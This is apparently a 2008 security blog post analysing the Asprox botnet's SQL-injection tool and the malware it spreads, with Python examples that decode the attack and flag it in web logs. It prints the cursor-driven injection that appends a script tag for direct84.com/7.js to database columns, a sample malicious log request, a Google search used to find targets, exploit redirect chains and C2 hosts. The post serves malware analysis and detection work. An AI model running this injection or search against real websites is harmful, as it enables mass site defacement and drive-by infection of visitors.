Thursday, May 15, 2008

Asprox Trojan and direct84.com

On 13 May 2008 SecureWorks posted an article on a SQL-injection attack tool that was being distributed within the Asprox botnet. The tool defaults to injecting a script reference to direct84[dot]com/7.js.

SQL-injection tool:

Filename: msscntr32.exe
MD5: b33be04bff3a9953a46c26dbc853af5c
Size: 17.5 KB (17,920 bytes)

The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:

@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C00410052004500200www.example.com
The CAST hex is UTF-16LE (an NVARCHAR literal, one 0x00 byte after every character) and decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE
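The request above is what a web server access log would show. As an added example (not from the post or from SecureWorks), the following Python decodes the UTF-16LE hex literal inside CAST(0x...) and flags access-log requests that carry the cursor-driven mass UPDATE; the log lines and the /products.asp path are constructed, and only PAGE_HEX is taken from the request shown above.

```python
"""Decode and flag CAST(0x...)-encoded T-SQL injection in web access logs.

Added example for this post; it is not code from SecureWorks or from the
msscntr32.exe tool. The access-log lines and the request path /products.asp
are constructed; only PAGE_HEX is the hex literal shown in the post.
"""
import re
from urllib.parse import unquote

# Hex literal from the post's sample request. 191 digits: the capture stops mid-byte.
PAGE_HEX = (
    "4400450043004C004100520045002000"                                  # "DECLARE "
    "4000540020007600610072006300680061007200280032003500350029002C00"  # "@T varchar(255),"
    "4000430020007600610072006300680061007200280032003500350029002000"  # "@C varchar(255) "
    "4400450043004C00410052004500"                                      # "DECLARE"
    "200"                                                               # cut-off trailing space
)

# User-agent the post attributes to the tool.
TOOL_UA = ("Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 "
           "Firefox/1.5.0 Opera 9.25")

CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
# Tokens from the injected statement the post's string dump shows. DECLARE plus
# two of the others is the cursor-driven mass UPDATE, not an ordinary parameter.
SQL_MARKERS = ("DECLARE", "CURSOR", "@@FETCH_STATUS", "sysobjects", "syscolumns",
               "exec(", "update [", "<script")


def decode_cast_hex(hex_digits):
    """Decode the literal inside CAST(0x... AS NVARCHAR(4000)).

    The tool encodes the statement as UTF-16LE, so every character is followed by
    a 0x00 byte; a capture cut off mid-character (like PAGE_HEX) is handled by
    dropping the dangling nibble and byte. Single-byte VARCHAR payloads fall back
    to latin-1.
    """
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        return raw[: len(raw) & ~1].decode("utf-16-le")
    return raw.decode("latin-1")


def to_cast_hex(sql):
    """Encode a statement the way the tool does (UTF-16LE, upper-case hex)."""
    return sql.encode("utf-16-le").hex().upper()


def scan_request(log_line):
    """Return a finding for a log line carrying a CAST-hex statement, else None."""
    m = CAST_HEX_RE.search(unquote(log_line))   # the hex arrives URL-encoded in the query string
    if not m:
        return None
    sql = decode_cast_hex(m.group(1))
    lowered = sql.lower()
    hits = [t for t in SQL_MARKERS if t.lower() in lowered]
    return {
        "sql": sql,
        "markers": hits,
        "suspicious": "DECLARE" in hits and len(hits) >= 3,
        "tool_ua": TOOL_UA in log_line,          # secondary indicator, trivially spoofable
    }


def scan_log(lines):
    """Scan access-log lines and keep only the suspicious findings."""
    return [f for f in map(scan_request, lines) if f and f["suspicious"]]


# Constructed injected statement, assembled from the fragments in the post's string
# dump; the cursor declaration the post does not show is left out.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+"
    "''<script src=http://www.direct84.com/7.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# Constructed combined-format log lines: one ordinary request, one carrying the
# statement above wrapped in the DECLARE/SET/EXEC shell the post's "@S=CAST(" hints at.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/May/2008:10:01:02 -0500] "GET /products.asp?id=17 HTTP/1.1" '
    '200 4120 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [15/May/2008:10:01:03 -0500] "GET /products.asp?id=17;DECLARE%20@S%20'
    'NVARCHAR(4000);SET%20@S=CAST(0x' + to_cast_hex(SAMPLE_SQL) + '%20AS%20NVARCHAR(4000));'
    'EXEC(@S);-- HTTP/1.1" 200 4120 "-" "' + TOOL_UA + '"',
]

if __name__ == "__main__":
    print(decode_cast_hex(PAGE_HEX))
    for finding in scan_log(SAMPLE_LOG):
        print(finding["markers"], "tool user-agent" if finding["tool_ua"] else "")
```

The marker threshold matters: the truncated literal in the post decodes to nothing more than two DECLAREs, which is not enough on its own, while the full statement trips CURSOR, @@FETCH_STATUS, exec( and the script tag at once. Treat the user-agent only as corroboration; it is a string the tool happens to send, not something a web application can rely on.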

The full functionality of the tool is unknown at this time but binary string analysis reveals some potential capabilities. The following relevant strings were observed.

A SQL statement that includes the default injected direct84[dot]com/7.js script.


The CAST hex decodes to:

char,['+@C+']))+''<script src=http://www[dot]direct84[dot]com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor[non-printable bytes]FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(var

(The fragments appear in the order the strings tool emitted them, not in statement order: the cursor loop walks every table and column pair and appends the script tag to each value with an UPDATE.)

The binary strings include a Google search format string, "inurl%%3Aasp+inurl%%3A%s", which after printf expansion and URL decoding is the query "inurl:asp inurl:<term>" (the %s is filled in by the tool and &start=%d pages through the results), with 100 results per page, the language set to English and the country set to US.

00005178 00405178 0 www.google.com
000051B0 004051B0 0 /search?hl=en&as_epq=&as_oq=&as_eq=&num=100&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images&as_q=inurl%%3Aasp+inurl%%3A%s&start=%d


The binary strings include a reference to direct84[dot]com/7.js as well as www[dot]answers[dot]com and youtube[dot]com. It is unknown whether these domains are used to test connectivity or to generate decoy traffic; the adjacent ".google." and "cache:" strings suggest the tool also reads Google's cached copies of pages.

00005484 00405484 0 direct84[dot]com/7.js
000054C0 004054C0 0 http://
000054DC 004054DC 0 .asp?
000054F4 004054F4 0 .google.
00005518 00405518 0 www[dot]answers[dot]com
00005554 00405554 0 youtube[dot]com
00005580 00405580 0 cache:

The following user-agent is used by the tool during SQL injection attacks:

00005598 00405598 0 Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25

Several IPs and a reference to s32.txt were visible. 66.232.102.169 is the host that aspimgr.exe later POSTs to (forum.php, below), and s32.txt matches one of the files the dropper writes to C:\WINDOWS.

00005A9C 00405A9C 0 s32.txt
00005AC0 00405AC0 0 66.199.241.98
00005ACE 00405ACE 0 82.103.140.75
00005ADC 00405ADC 0 72.21.63.114
00005AE9 00405AE9 0 66.232.102.169
00005AF8 00405AF8 0 66.96.196.53

direct84.com analysis:
The direct84.com domain currently fast-fluxes to several different IPs in the US, Israel and Poland. During one short interval it returned the following round-robin addresses: 146.6.143.67, 172.163.165.232, 212.160.151.233, 66.1.4.187, 68.45.135.137, 69.73.111.7, 71.201.175.192, 74.248.14.151, 84.109.131.90, 89.77.235.81. Two of them, 68.45.135.137 and 84.109.131.90, also appear in the IP list of the decoded common.bin shown below, consistent with the domain resolving to infected hosts running the aspimgr.exe HTTP server on port 80 rather than to dedicated servers.

The direct84.com 7.js script returned an iframe redirect to http: //67[dot]228[dot]13[dot]98/cgi-bin/index.cgi?user1. (This and following redirect paths continually change).

The 67[dot]228[dot]13[dot]98 cgi request returns an iframe redirect to http: //216[dot]32[dot]85[dot]234/index.php

The index.php returned 3 exploits:
Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX control buffer overflow (CVE-2007-4336)
Apple QuickTime RTSP Content-Type header stack buffer overflow (CVE-2007-6166)
MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)

The payload is http: //216[dot]32[dot]85[dot]234/load.php?MSIE downloaded as ldr.exe.

malware analysis:
The malware ldr.exe is detected as Trojan.Asprox (Symantec).

Filename: ldr.exe
MD5: f27dc661f7b51dd76adfb2d371b888e8
Size: 47.5 KB (48,640 bytes)

The following files are created:

C:\WINDOWS\db32.txt
C:\WINDOWS\system32\aspimgr.exe
C:\WINDOWS\ws386.ini
C:\WINDOWS\s32.txt

The following file is deleted:

C:\WINDOWS\db32.txt

The following registry keys are created to install aspimgr.exe as a service. Start = 2 (SERVICE_AUTO_START) and Type = 0x10 (SERVICE_WIN32_OWN_PROCESS) mean the binary starts automatically at boot in its own process, ObjectName = LocalSystem means it runs as SYSTEM, and the display name "Microsoft ASPI Manager" imitates a legitimate Microsoft component.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {4C7783CA-076B-4313-BBF1-21FB818E7701}

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to "ns.uk2.net" on port 53 (IP).
* Connects to "www.yahoo.com" on port 80 (IP).
* Connects to "www.web.de" on port 80 (IP).
* Connects to "FAKE" on port 4660 (IP).

The malware aspimgr.exe initiates a POST connection to http: //66[dot]232[dot]102[dot]169/forum.php (one of the IPs embedded in msscntr32.exe, above). The request passes system and trojan characteristics, and a binary file, common.bin, is returned containing the trojan's spamming instructions: IP addresses, email addresses, SMTP commands and the spam email content. common.bin can be decoded by XORing each byte with 27 (hex 0x1B), as previously referenced at SANS.

A sample decoded common.bin file. The "5" characters that appear where a "d", a CR, an LF or a tab should be (as in "Win5ows", "Enco5ing" and the "55" between header lines) are a copy artifact: in the XOR-encoded file those bytes are 0x7F, 0x16, 0x11 and 0x12, which a text tool rendered as "." before decoding, and "." XOR 0x1B is "5". Decoding the raw bytes directly avoids this.

98.200.11.115567.161.226.835129.59.138.199568.45.135.137584.109.131.90568.249.106.122524.126.130.229598.208.97.485<5_n>70.231.150.1615209.74.208.75589.78.235.81584.10.100.196575.137.93.12586.16.211.245566.233.229.99574.60.224.365<5_m>74.50.120.15055/customerup5ate5/confirm.aspx5/in5ex.php5/55/5etails.aspx5/94.js5/servlet5/profile5/ecar5s5/7.js5/olb5/custform5524.74.176.23755akronchablis@gar5ener.com55akroncha5@earthlink.net55akroncha5@technologist.com55akroncha55@unite5layer.com55akroncha5wick@royalgar5ensupplies.com55akronchaff@rrfabrications.com55akronchagrin@hair5resser.net55akronchain@clerk.com55akronchain@5iplomats.
[truncated]
Message-ID: <%%MSGID%%>55From: %%FROM%%55To: <%%RCPT%%>55Subject: %%SUBJ%%55Date: %%DATE%%55MIME-Version: 1.055Content-Type: multipart/alternative;555boun5ary="%%BND:1%%"55X-Priority: 355X-MSMail-Priority: Normal55X-Mailer: Microsoft Outlook Express 6.00.2900.218055X-MimeOLE: Pro5uce5 By Microsoft MimeOLE V6.00.2900.21805555This is a multi-part message in MIME format.5555--%%BND:1%%55Content-Type: text/plain;555charset="iso-8859-1"55Content-Transfer-Enco5ing: quote5-printable5555 Get popular cheap Soft right now!5 Absolutely all OF OUR OEMS ARE AVAILABLE ON EVERY EUROPEAN LANGUAGES -5 English, French, Italian, Spanish, German an5 any others..55 Win5ows Vista Ultimate - $71.065 Win5ows XP Pro With SP2 - $57.555 Office Enterprise 2007 - $72.015
[truncated]
helo5555<11300000resolve55<11301010ptr55<11300010reverse55<11301010fqdn55<113000115nserror55<113000115nsinvali555<113000115nsfail55<113000115nslookup55
[truncated]
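The XOR decoding described above, plus the cross-check against the direct84.com round-robin addresses from the fast-flux section, as an added Python example that is not code from the post or from the SANS reference: the common.bin content is constructed from the record types visible in the dump above and encoded with the same 0x1B key, and decode_text_tool_copy reproduces why "d", CR, LF and tab show up as "5" in the dump.

```python
"""XOR-decode an Asprox common.bin spam task and explain the '5' artifact in the dump above.

Added example for this post, not code from the post or from the SANS write-up it
cites. SAMPLE_PLAINTEXT is constructed from the kinds of records the dump shows
(bot/relay IPs, URL paths, an SMTP template with %%FROM%%-style placeholders);
FLUX_IPS are the direct84.com round-robin addresses listed earlier in the post.
"""
import re

XOR_KEY = 0x1B  # per the post: every byte of common.bin XORed with 27

# direct84.com round-robin addresses from the post, used for the cross-check below.
FLUX_IPS = {"146.6.143.67", "172.163.165.232", "212.160.151.233", "66.1.4.187",
            "68.45.135.137", "69.73.111.7", "71.201.175.192", "74.248.14.151",
            "84.109.131.90", "89.77.235.81"}

IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PLACEHOLDER_RE = re.compile(rb"%%[A-Z]+(?::\d+)?%%")


def xor_bytes(data, key=XOR_KEY):
    """XOR every byte with the key; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def parse_common_bin(raw):
    """Decode common.bin and pull out what a responder wants first: the IP list,
    the URL paths and the spam-template placeholders. Records are LF-separated;
    the SMTP template inside uses CRLF."""
    text = xor_bytes(raw)
    records = [r.rstrip(b"\r") for r in text.split(b"\n")]
    return {
        "ips": [m.decode() for m in IPV4_RE.findall(text)],
        "paths": [r.decode() for r in records if r.startswith(b"/")],
        "placeholders": sorted({m.decode() for m in PLACEHOLDER_RE.findall(text)}),
        "text": text,
    }


def flux_overlap(raw, flux_ips=FLUX_IPS):
    """IPs present both in the task's IP list and in the domain's round-robin
    answers: evidence that the fast-flux front end is the infected hosts themselves."""
    return sorted(set(parse_common_bin(raw)["ips"]) & set(flux_ips))


def text_tool_copy(data):
    """Mimic copying the raw file through a tool that prints non-printable bytes as '.'."""
    return bytes(b if 0x20 <= b < 0x7F else 0x2E for b in data)


def decode_text_tool_copy(raw):
    """Reproduce the artifact in the post's dump. In the XOR-encoded file a plaintext
    'd' is stored as 0x7F (DEL), CR as 0x16, LF as 0x11 and TAB as 0x12; a text tool
    shows each as '.', and '.' ^ 0x1B is '5'. Every other printable byte survives."""
    return xor_bytes(text_tool_copy(raw)).decode("latin-1")


# Constructed plaintext: LF between IP and path records, CRLF (and a TAB
# continuation) inside the SMTP template, matching the '5'/'55'/'555' runs in the dump.
SAMPLE_PLAINTEXT = (
    b"98.200.11.115\n67.161.226.83\n68.45.135.137\n84.109.131.90\n"
    b"/customerupdate\n/index.php\n/details.aspx\n/7.js\n"
    b"Message-ID: <%%MSGID%%>\r\nFrom: %%FROM%%\r\nTo: <%%RCPT%%>\r\n"
    b"Subject: %%SUBJ%%\r\nDate: %%DATE%%\r\nMIME-Version: 1.0\r\n"
    b"Content-Type: multipart/alternative;\r\n\tboundary=\"%%BND:1%%\"\r\n"
    b"X-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\n\r\n"
    b"Windows Vista Ultimate - $71.06\r\n"
)
SAMPLE_COMMON_BIN = xor_bytes(SAMPLE_PLAINTEXT)  # what the bot receives from forum.php

if __name__ == "__main__":
    parsed = parse_common_bin(SAMPLE_COMMON_BIN)
    print(parsed["ips"], parsed["paths"], parsed["placeholders"])
    print("also in direct84.com round robin:", flux_overlap(SAMPLE_COMMON_BIN))
    print(decode_text_tool_copy(SAMPLE_COMMON_BIN)[:60])
```

Run parse_common_bin on the bytes as captured from the wire or from disk, never on a copy that has been through strings or a terminal paste; the only bytes a single-byte XOR maps out of the printable range here are "d" and the control characters, which is exactly the damage visible in the dump above.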

Spamming must pay well...